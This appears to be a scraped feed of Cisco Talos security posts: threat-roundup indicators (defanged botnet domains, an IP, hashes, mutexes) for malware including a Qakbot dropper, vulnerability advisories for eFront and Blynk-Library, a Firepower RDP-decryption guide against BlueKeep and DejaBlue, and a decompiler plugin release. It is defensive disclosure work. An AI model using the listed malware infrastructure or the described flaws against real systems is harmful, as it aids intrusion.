                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  e13678[.]dspb[.]akamaiedge[.]net8
                  www[.]yourbotnet2[.]cn6
                  www[.]microsoft-spynet[.]com2
                  carder[.]bit1
                  11776[.]BODIS[.]com1
                  www[.]teto[.]ly1
                  scorpions69[.]cwahi[.]net1
                  mybotnett[.]hostingsiteforfree[.]com1
                  egysn1[.]no-ip[.]biz1
                  poker365site[.]com1
                  www[.]yourbotnet[.]cn1
                  www[.]kokainpawer[.]com1
                  www[.]reskuesecurities[.]host[.]org1
                  www[.]secureantibot[.]net1
                  www[.]moawia2[.]eb2a[.]com1
                  www[.]microsoft-windows-security[.]com1
                  Files and or directories createdOccurrences
                  \cleansweep.exe178
                  \cleansweep.exe\cleansweep.exe177
                  \cleansweep.exe\config.bin175

                  File Hashes

                  15f730329a5f5931052f028770629fd0fc90661c0bdd5a98c24c5c5b79f81774 21a0f59cd2dd48186a2a5f45b96a7b9f2152bd22e361f50547ba76d8cb82b6eb 29e261b1bc20231df371c5718d9619c2445cb31260609e6a4787395b1382d883 37bbbe62a193a2b85dea704e2375850bd620e7b2e68235df0a5aa78aa2ba6688 38a0e91b74713a524f49d1ddce5dd1c3a22c34fb053bedde39659792c4acd0fc 38ae428938b7dc6a09f33bf3f3a55c7eec15a0cae695d9ac3e435a1ad887cdbc 3c3fa850ef2811432a6a37733e6fdb590ec6527291d0abcf0f74287df5214c76 3d03bd0db3532078bdba4b794da355c189222850535820a3f2570b4f1343e155 3e4393b3980a0dff3e6b364ea1ae1dabab7e079f90bf002efa280901ee7e0894 40b836c7f127ac0b67343746ad46e2058dd56f6b198629667e2c4dff19b06770 43d25cdcd985d5dceedfcd655ce06b9fb58df5e6a680764be91149249140d836 467e29745a7ec5f30c3df7f2cd74b78df6f075ee9b0c709ddec34382f6f9f116 46a112798b137e1977df820e5ba4d9f8908ff802e64f9d978f43354cd175712f 48945ce8f30583fb2796d0b8496a6a374bd2b57fab8965f758ba314a2c29ea5c 4a6125eb20553669ffb92f8b04baa3ed685ea8e34181814e82a1d26b128e0376 4d34b2fbc133331656ebf6583657a2a545387eef68829909649a8a161943531d 4dd1b6513ac756dcddd584a1734f2bf44af0741c5604c570bed28a9eced9acf6 4f4545bb03e227873fff3be2e471e012ff85440a11f9284a86c38611ac57f0ab 4f6e94a61f766e0b8d95009da98bfc0f525ce02932129d12a2da22cdac0edcb8 4fba37bd388eb78145f81f8c8679d4c147792ada6017b6665517974e291013a4 503309f6f90a6cac1f90153c89d08efa7856105eabaa64d56a3158880e057d88 52a69ad3586a2efe01f23d585c351c13da945453194bacb4bdaab6949b9d5fb0 5412da86b9e5483547f10d2e36da09f17d6c9e0956b8167987a72b4c7827b105 542f2945f5b6de001dac02ba0db3a7ca0987ea3f13a2a83b1b2cd9ddc40b0e7d 557818fb74b32f1e642f4ad228e657a73a11844afb5250a827a953a0e690dcc7
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network SecurityThis has coverage
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  UmbrellaThis has coverage
                  WsaThis has coverage

                  Screenshots of Detection

                  AMP


                  ThreatGrid


                  Umbrella




                  Win.Dropper.Qakbot-7133972-0

                  Indicators of Compromise

                  Registry KeysOccurrences
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE\SPYNET
                  Value Name: SpyNetReporting
                  25
                  <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                  Value Name: Blob
                  25
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE 25
                  <HKLM>\SOFTWARE\MICROSOFT\MICROSOFT ANTIMALWARE\SPYNET 25
                  MutexesOccurrences
                  Global\eqfik25
                  Global\ufwao25
                  llzeou25
                  5362a8e863415e3c7ed2392c736a25
                  5362a8e863415e3c7ed2392c736/C25
                  IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                  198[.]49[.]66[.]13025
                  Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                  www[.]allens-treasure-house[.]com25

                  File Hashes

                  09d52dcd746678ab7cfdf98920c69af368d0024dd387fea4cb4cf23af7c8100c 0fc1f1bbe848a9b6fdeb45135b262dcc2bface23a484f1f004c68dfc1048ef12 13579cd0a09fc3f35b0e086a3e4da7044005f820eb91a5a8172b37a997d9baf8 17d1ab8faf6c77c2155c414ff152afcb54dfdb274898fe6875db1b0b5b439977 1bd9b51dd8926e70c8749e415c9c87192c23240e6bd78fa1ff141e320ef2ad13 1fe482aac4ef067817e8b65ad3411cb94af8cad2a3758e284ccd42d25370723c 20e192f48253abdeba665e38681d5fc6977cf114007b45967ca7a0cdd0cccd96 21a01de82da765f27f34dc14dfda9660cfc3fed24423d98705d2d1550ea36ba1 2976602ffae5758d0eb0e7ccd0fa8eb7595a4ced9ead3a8b830410a2058b99e1 2ec0ff7389d034e2bd400e451edca5a3deda018a87dfccc9118f6f116759034b 3c4680da012f0b51a506dc7a0fbe3ae296d7ad96366dc8219167e6ac3887fc77 42be15098d49494e1cc88f97d6d4ed5547839b38db878e798764481d484853df 4dc140ee0226f7b07fe8fd810ba2486415bc3b13018b55238ca8865a76943618 5362a8e863415e3c7ed2392c736fd118775b470e37ea19257fc4c41941b6f342 546bbc6277e9a0057e38f166b2c9b066e27581e160b5c98043566225e2c2d836 63b6c543e28bae70de1b6fe67906831327d06dd65ccb8d8ca52e92636b3931bd 68d76d7697facbe74d18a20181f1e3eb5c17d43ed0bc69fdaab91401b027d8f2 69c47be5330ec6b8946feb79d31d5590d70cca9cc1e49fc120695db169992f63 737eed504a364c8f666c35348e42031f8177e7c8c11bb34f2c2110ba2a55c419 766b64050ada4916906acfb8c97caf163c68f9d38af60243b9a4384609ec0712 786b478fdc0cb9e9b3d09c788f3e13fe04c13db3c21bf750b23d3d421c06ad87 8a01813be148547015b7980bc0974c6da07e57044ed5029655ec624af4f23e59 8ea9c35eec1fb14c8866526e32d4dff022c8ef435afab922989468cd674007e8 92572a77f909ea7edb20fb235012065923928c3ce3a29d9cbdf672a55537121a 9ada91d7ff3140a80f4b344fc6067a105577443792941ab6675f7d4d862c265a
                  *See JSON for more IOCs

                  Coverage

                  ProductProtection
                  AmpThis has coverage
                  Cloudlock N/A
                  CwsThis has coverage
                  Email SecurityThis has coverage
                  Network Security N/A
                  Stealthwatch N/A
                  Stealthwatch Cloud N/A
                  Threat GridThis has coverage
                  Umbrella N/A
                  Wsa N/A

                  Screenshots of Detection

                  AMP


                  ThreatGrid




                  Exploit Prevention

                  Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
                  Madshi injection detected - (3693)
                  Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
                  CVE-2019-0708 detected - (3432)
                  An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
                  Process hollowing detected - (1556)
                  Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
                  Kovter injection detected - (1367)
                  A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
                  Dealply adware detected - (210)
                  DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
                  Gamarue malware detected - (203)
                  Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
                  Trickbot malware detected - (133)
                  Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
                  Installcore adware detected - (105)
                  Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
                  PowerShell file-less infection detected - (56)
                  A PowerShell command was stored in an environment variable and run. The environment variable is commonly set by a previously run script and is used as a means of evasion. This behavior is a known tactic of the Kovter and Poweliks malware families.
                  Excessively long PowerShell command detected - (37)
                  A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.

                  Vulnerability Spotlight: Two vulnerabilities in Epignosis eFront

                  $
                  0
                  0

                  Yuri Kramarz of Security Advisory Incident Response EMEAR discovered these vulnerabilities.

                  Cisco Talos discovered two vulnerabilities in Epignosis eFront — one of which could allow an attacker to remotely execute code on the victim system, and another that opens the victim machine to SQL injections. eFront is an LMS platform that allows users to control their virtual training environments and data. The software boasts the ability to allow large companies to train their employees quickly and efficiently.

                  In accordance with our coordinated disclosure policy, Cisco Talos worked with Epignosis to ensure that these issues are resolved and that an update is available for affected customers. Epignosis confirmed that they released eFront version 5.2.13 to address these issues.

                  Vulnerability details

                  Epignosis eFront LMS PHP deserialization code execution vulnerability (TALOS-2019-0858/CVE-2019-5069)

                  A code execution vulnerability exists in Epignosis eFront LMS v5.2.12. A specially crafted web request can cause unsafe deserialization potentially resulting in PHP code being executed. An attacker can send a crafted web parameter to trigger this vulnerability. Talos discovered that the application deserialized untrusted data without properly limiting or validating the incoming data type.

                  Read the complete vulnerability advisory here for additional information.

                  Epignosis eFront LMS unauthenticated SQL injection vulnerability (TALOS-2018-0859/CVE-2019-5070)

                  An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. Specially crafted web request to login page can cause SQL injections, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.

                  Read the complete vulnerability advisory here for additional information.

                  Versions tested

                  Talos tested and confirmed that version 5.2.12 of Epignosis eFront is affected by these vulnerabilities.

                  Coverage

                  The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rules: 50746, 50755 - 50760

                  The latest on BlueKeep and DejaBlue vulnerabilities — Using Firepower to defend against encrypted DejaBlue

                  $
                  0
                  0
                  This blog was authored by Brandon Stultz, Holger Unterbrink and Edmund Brumaghin.

                  Executive summary


                  Over the past few months, Microsoft has released several security updates for critical Remote Desktop Protocol (RDP)-related security bugs. These bugs are significant for IT infrastructure because they are classified as "wormable," meaning future malware that exploits them could spread from system to system without requiring explicit user interaction. These vulnerabilities could be exploited by an attacker sending a specially crafted request to the target system's Remote Desktop Service via RDP. We have seen how destructive these kinds of attacks can be, most notably WannaCry. We highly recommend organizations immediately apply Microsoft's patches. Cisco Talos released detection coverage for CVE-2019-0708 and also enhanced guidance to help organizations facilitate inspection of RDP sessions here. Microsoft published additional security updates last month to mitigate two additional remote code execution vulnerabilities, CVE-2019-1181 and CVE-2019-1182, affecting several versions of Microsoft Windows. These bugs are referred to as "DejaBlue" due to their similarities to BlueKeep.

                  Once again, Cisco Talos started working immediately to reverse-engineer the RCE vulnerabilities. Protections for both CVE-2019-1181 and CVE-2019-1182 now exist to keep your systems secure. SID 51369 for SNORT® correctly blocks exploitation of CVE-2019-1181 and CVE-2019-1182. In this post, we'll run through the details of how to protect against this "DejaBlue" exploit and walk through the steps to protect your environment.

                  Remote Desktop Services remote code execution vulnerability (CVE-2019-0708)


                  This vulnerability was originally published in May 2019, and is often referred to as "BlueKeep." It is a pre-authentication vulnerability, meaning that an attacker could attempt to exploit it without first having to authenticate to the affected system with valid credentials. Microsoft released a security advisory regarding this vulnerability and has repeatedly urged organizations to apply the corresponding security update to systems to mitigate the threat of attacks targeting it.

                  Significant research has taken place over the past few months with many researchers working to successfully develop an exploit payload. Working remote code execution exploits have now been developed, although none have been publicly released at this point. As such, organizations should ensure their systems are updated as soon as possible to ensure that their systems are no longer affected by this vulnerability. In situations where security updates cannot be applied, organizations should leverage Network Level Authentication (NLA) functionality available within Microsoft Windows and limit exposure by restricting access to RDP servers from the internet.

                  Remote Desktop Services remote code execution vulnerability (CVE-2019-1181, CVE-2019-1182)


                  Microsoft published additional security updates last month to mitigate two additional remote code execution vulnerabilities affecting several versions of Microsoft Windows. Similar to what was described for CVE-2019-0708, these vulnerabilities are also pre-authentication and do not require any explicit user interaction to successfully compromise affected systems. Microsoft released guidance bulletins for CVE-2019-1181 and CVE-2019-1182 and recommends that organizations ensure their systems are updated as quickly as possible. In addition to installing the security updates, the bulletins specify that enabling NLA on affected systems could be used to provide partial mitigation as this will require attackers to authenticate to RDP servers prior to being able to reach the exploitable condition.

                  Using Firepower to defend against encrypted DejaBlue


                  Like BlueKeep, protection for DejaBlue requires RDP decryption. The following is a guide on setting up RDP decryption with Cisco Firepower. Since DejaBlue targets newer versions of Windows, this guide specifically applies to Windows Server 2019. For older versions of Windows, refer to the guide we previously wrote for BlueKeep.

                  Note: This procedure requires an inline Firepower device that supports SSL decryption. For more information visit Cisco Next-Generation Intrusion Prevention System (NGIPS).

                  Steps for RDP Decryption:

                  1. Determine the certificate used by the RDP server.



                  In Windows Server 2019, RDP TLS certificates are configured in the Server Manager.



                  Click on "Remote Desktop Services" and then "Collections." Click on "Tasks" in the upper right hand corner and then select "Edit Deployment Properties."



                  Click "Certificates."




                  Under "Certificates," click on "View Details" under the Certificate Subject Name.

                  Note the certificate Thumbprint. This is the TLS certificate used in the RDP deployment.

                  2. Export the RDP certificate and private key:



                  Open "Run" and then type "certlm.msc."




                  Locate the certificate that matches the thumbprint from Step 1.




                  Right click on the Certificate. Under "All Tasks" click on "Export…"




                  In the Export Wizard, click Next.




                  Click on "Yes, export the private key."



                  Make sure "PKCS" is selected.




                  Click on "Password" and then enter a password to encrypt the private key.



                  Type in a file name for the PFX file and click "Next."



                  Finally, click "Finish."

                  You have successfully exported the RDP certificate and private key.

                  3. Configure Windows ciphersuites for Firepower.



                  Open Group Policy Management.



                  Right click on your organization's group policy and click "Edit."

                  Navigate to: Computer Configuration -> Policies -> Administrative Templates -> Network -> SSL Configuration Settings. Click on SSL Cipher Suite Order.


                  Set the option to "Enabled" and paste in a set of Ciphersuites Firepower supports for static key decryption:

                  TLS_RSA_WITH_AES_128_CBC_SHA256,TLS_RSA_WITH_AES_128_CBC_SHA,TLS_RSA_WITH_AES_256_CBC_SHA256,TLS_RSA_WITH_AES_256_CBC_SHA,TLS_RSA_WITH_RC4_128_SHA,TLS_RSA_WITH_3DES_EDE_CBC_SHA


                  Click OK. The RDP host should now be set up.

                  Now to prepare the RDP certificate and private key for the Firepower appliance.

                  4. Prepare the RDP certificate and private key for Firepower.

                  For this step, you will need the OpenSSL tool and the PFX file exported in Step 2 (rdp.pfx, in this example).

                  Extract the RDP certificate from the PFX file:
                  $ openssl pkcs12 -in rdp.pfx -clcerts -nokeys -out cert.pem
                  Enter Import Password:

                  This command will ask for the import password — this is the password we typed in on Step 2.

                  Extract the RDP private key from the PFX file:
                  $ openssl pkcs12 -in rdp.pfx -nocerts -out key.pem
                  Enter Import Password:

                  Enter PEM pass phrase:

                  Verifying - Enter PEM pass phrase:

                  The above command will ask for the import password again, as well as a PEM passphrase. Remember this private key passphrase, we will need it when we add the RDP certificate to Firepower.

                  5. Import the RDP key into Firepower.

                  At this point, you should have the RDP cert "cert.pem," as well as the encrypted RDP private key "key.pem."



                  Navigate to Objects -> Object Management.





                  Select "Add Internal Cert" on the top right.



                  Name the certificate (e.g. the server name) and either paste in "cert.pem" or browse to the "cert.pem" file in the "Certificate Data" section. Do the same for "key.pem" in the "Key" section. Click the "Encrypted" box and type in the PEM passphrase from Step 4.

                  You have successfully imported the RDP certificate and private key. Now to create a SSL policy for decryption.

                  6. Create an SSL Policy



                  Navigate to Policies -> SSL




                  Select "New Policy."



                  Enter a policy name and description with default action "Do not decrypt."






                  Once the policy editor has loaded, select "Add Rule" (top right).

                  Name the rule and give it the Action "Decrypt - Known Key". Click the "with" field and select the certificate you imported earlier in Step 5.

                  If applicable, select Source and Destination networks or leave them as "any."




                  Click on the "Ports" tab and input the TCP port 3389 (if appropriate for your environment) under "Selected Destination Ports" and click "Add."




                  Under the "Logging" tab, enable logging at the end of the connection if desired.

                  Click "Add" and then "Save" to save the rule.

                  Additional SSL documentation is available here.

                  6. Enable the Intrusion Prevention Rule for DejaBlue.

                  Navigate to Policies -> Access Control -> Intrusion Prevention.

                  Edit the desired Intrusion Policy.

                  Filter for Snort ID 51369: "OS-WINDOWS Microsoft Windows RDP DecompressUnchopper integer overflow attempt."

                  Click the checkbox and select Rule State -> Drop and Generate Events.




                  Click "Policy Information" and commit changes.

                  7. Configure the Access Control Policy

                  Navigate to Policies -> Access Control and edit the relevant Access Control Policy.




                  Under the "Advanced" tab, edit "SSL Policy Settings."




                  Select the SSL Policy we created in Step 5 and click OK.



                  Ensure that your Intrusion Prevention Policy is selected under "Intrusion Policy used before Access Control rule is determined" within the "Network Analysis and Intrusion Policies" section of the "Advanced" tab.




                  Under the "Rules" tab of your Access Control Policy, ensure you have an appropriate Intrusion Policy set for any "Allow" rules.



                  If appropriate, enable the Intrusion Prevention Policy for your Default Action, as well.




                  Save and deploy changes. Verify RDP connectivity and functionality.




                  Firepower blocking the encrypted DejaBlue exploit:



                  Conclusion


                  Just as CISOs awaited the arrival of a dreaded BlueKeep worm, DejaBlue appeared on the scene to reset the clock. If exploited, an attacker could use DejaBlue to infect many machines quickly and spread malware. The WannaCry ransomware attack from 2017 is the most extreme example of how dangerous this could be. Using the steps outlined in this post, Cisco Firepower users can protect themselves from DejaBlue and BlueKeep.

                  Organizations need to take additional steps to ensure that services like RDP and SMB are not exposed unless explicitly required, but does not eliminate the need for patching. This is yet another example of why patching is one of the core fundamental concepts in information security. Vulnerabilities this severe appear periodically, and organizations need to be prepared to respond in a variety of different ways. Patching takes time and making sure that you have detection and prevention in place can require varying levels of difficulty.

                  Vulnerability Spotlight: Information disclosure vulnerability in Blynk-Library

                  $
                  0
                  0



















                  Lilith Wyatt of Cisco Talos discovered this vulnerability.

                  Cisco Talos recently discovered an information disclosure vulnerability in Blynk-Library. Blynk-Library is a small library for connecting more than 400 different embedded device models into a private or enterprise Blynk-Server instance. According to the Git repository, it is the "most popular internet-of-things platform for connecting any hardware to the cloud."

                  In accordance with our coordinated disclosure policy, Cisco Talos worked with Blynk to ensure that these issues are resolved and that an update is available for affected customers.

                  Vulnerability details

                  Blynk inc. Blynk-Library BlynkProtocol<Transp>::processInput() information disclosurevVulnerability (TALOS-2019-0854/CVE-2019-5065)

                  An exploitable information disclosure vulnerability exists in the packet-parsing functionality of Blynk-Library v0.6.1. A specially crafted packet can cause an unterminated strncpy, resulting in information disclosure. An attacker can send a packet to trigger this vulnerability.

                  Read the complete vulnerability advisory here for additional information.

                  Versions tested

                  Talos tested and confirmed that version 0.6.1 of Blynk-Library is affected by this vulnerability.

                  Coverage

                  The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                  Snort Rule: 50770

                  GhIDA: Ghidra decompiler for IDA Pro

                  $
                  0
                  0
                  By Andrea Marcelli

                  Executive Summary

                  Cisco Talos is releasing two new tools for IDA Pro: GhIDA and Ghidraaas.

                  GhIDA is an IDA Pro plugin that integrates the Ghidra decompiler in the IDA workflow, giving users the ability to rename and highlight symbols and improved navigation and comments. GhIDA assists the reverse-engineering process by decompiling x86 and x64 PE and ELF binary functions, using either a local installation of Ghidra, or Ghidraaas ( Ghidra as a Service) — a simple docker container that exposes the Ghidra decompiler through REST APIs.

                  Here is a quick video walking users through this new tool:
                    

                  Features

                  This new IDA plugin provides the following features:
                  • Synchronization of the disassembler view with the decompiler view: In the default configuration, the disassembler view is synchronized with the decompiler view. By clicking on different functions, both in the IDA Graph view or Text View, the decompiler view is updated accordingly. When a function is decompiled, the result is cached, making the transition between functions quicker.
                  • Decompiled code syntax highlight: The decompiled code is syntax-highlighted as C code using the pygments Python library.
                  • Code navigation by double-clicking on symbol name: A double click (or right-click -> Goto) over the name of a function in the decompiler view, automatically opens the selected function in the decompiler and disassembler view. The same behaviour happens if the functions is selected through the disassembler view and the synchronization between the two views is active.
                  • Adding comments in the decompiler view: GhIDA allows users to insert and update comments in the decompiler view using the default IDA shortcut (or right-click -> Add comment). Each comment will be displayed at the end of the selected line, separated by a double slash. Comments are not added in the disassembler view, too, but they are cached and displayed in the decompiler view, even if the same function is decompiled multiple times.
                  • Symbols renaming: When a symbol is selected in the decompiler view, it is possible to rename it by pressing N (or right-click -> Rename) and then insert the new name in the dialog. The symbol name will be updated in the decompiler and disassembler view. Due to the different syntax used by the Ghidra decompiler and IDA, only a subset of the symbols can be renamed. If a symbol is renamed in the disassembler view, the function must be removed from cache and decompiled again to update the symbols name in the decompiler view, .
                  • Symbols highlight: When clicking on a symbol in the decompiler view, all the other occurrences of the same symbol are highlighted too. The plugin also highlights the corresponding symbols in the disassembler view, but as mentioned above, this is limited to subset of the available symbols.
                  • Storage of decompiled code and comments: If the corresponding option is selected in the configuration, GhIDA stores in two JSON files the decompiled code and comments when IDA is closed. They will be automatically restored the next time the IDB is opened.

                  Installation

                  • GhIDA requires IDA Pro 7.x.
                  • Install the following two Python2 libraries:
                  • pip2 install requests
                  • pip2 install pygments
                  • Clone or download the GhIDA repository from GitHub and copy ghida.py and the ghida_plugin folder in the plugins folder of your IDA Pro installation.
                  • The first time GhIDA is launched (Ctrl+Alt+D or Edit -> Plugins -> GhIDA Decompiler) choose between a local Ghidra installation or the Ghidraaas server. If you want to use GhIDA with a local installation of Ghidra:
                  • Install Ghidra
                  • Add the path of the ghidra folder in the installation path
                  Otherwise, launch a local instance of the server using the Ghidraaas docker container.

                  Quick start

                  Select a function in IDA's Graph or Text view. Then, press CTRL+ALT+D or (Edit -> Plugins -> GhIDA Decompiler). Wait a few seconds and a new window will open showing the decompiled code of the function.

                  For the best user experience, we suggest to open the decompiler view side-to-side with the disassembler view and keep active the synchronization between the two views. It is best to rename a symbol in the decompiler view since it will automatically update in the disassembler view.

                  Technical Details

                  GhIDA exports the IDA project using idaxml.py, a Python library shipped with Ghidra, and then invokes Ghidra in headless mode to obtain the decompiled code, either directly using the local installation, or through the Ghidraaas server, without requiring any additional analysis.

                  When GhIDA is called the first time, the idaxml library is used to create two files: an XML file that embeds a program description according to the IDA analysis (including functions, data, symbols, comments, etc.) and a bytes file that contains the binary code of the program under analysis. While the binary file does not change during the time, the XML file is recreated each time the user flushes the GhIDA cache, in order to take into account updates the user did in the program analysis. To obtain the decompiled code, GhIDA uses FunctionDecompile.py, a Ghidra plugin in Python that exports to a JSON file the decompiled code of a selected function.

                  Ghidra decompiler under the hood

                  The Ghidra decompiler is a standalone C++ project. Ghidra communicates with the decompiler over stdin and stout using a binary protocol specified in the DecompileProcess class, while the DecompInterface Java class implements the logic of the communication.

                  The decompilation process requires the following steps:
                  • Decompiler initialization (requires the specification of the processor, etc.).
                  • The Java client ask to decompile a function.
                  • The decompiler asks the PCodePacked for each instruction of the function.
                  • The decompiler asks for symbols and comments.
                  • The decompiler returns an XML with the decompiled info.

                  This article runs down an initial attempt to directly communicate with the Ghidra decompiler. However, sending PCodePacked, symbols and comments to the decompiler, and finally translating the output to C code, requires a complicated process that goes beyond the scope of this project.

                  Ghidra allows users to import a binary as either an XML or bytes file, a procedure that allows to import in Ghidra projects exported from IDA. Ghidra also provides an IDA plugin with a Python library to ease the exporting process. More importantly, Ghidra can execute Python scripts (using the command-line-based version Analyze Headless) directly on IDA exported XML and bytes files.

                  By exporting the IDA IDB and calling the Ghidra decompiler through the Headless Analyzer, add a small overhead to the decompilation process, but it saves a huge amount of work by abstracting the low-level communication with the Ghidra decompiler.


                  Viewing all 2033 articles
                  Browse latest View live


                  <script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>